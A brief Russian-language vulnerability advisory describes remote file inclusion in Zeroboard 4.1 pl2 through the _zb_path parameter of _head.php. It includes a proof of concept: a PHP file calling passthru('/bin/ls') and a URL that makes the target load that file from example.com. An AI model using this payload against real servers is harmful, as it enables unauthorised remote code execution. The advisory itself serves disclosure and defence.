Zeroboard - PHP доска объявлений для LINUX и UNIX платформ.
Уязвимость позволяет включать произвольные PHP файлы. Файл _head.php недостаточно санирует входящие параметры. Если в php.ini установлены переменные "allow_url_fopen" и "register_globals" в значение "on", можно
включать произвольные PHP файлы из удаленного URL через сценарий _head.php. Пример:
PHP Source file a.php
<? passthru("/bin/ls"); ?>
Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a
Уязвимость обнаружена в Zeroboard 4.1 pl2.
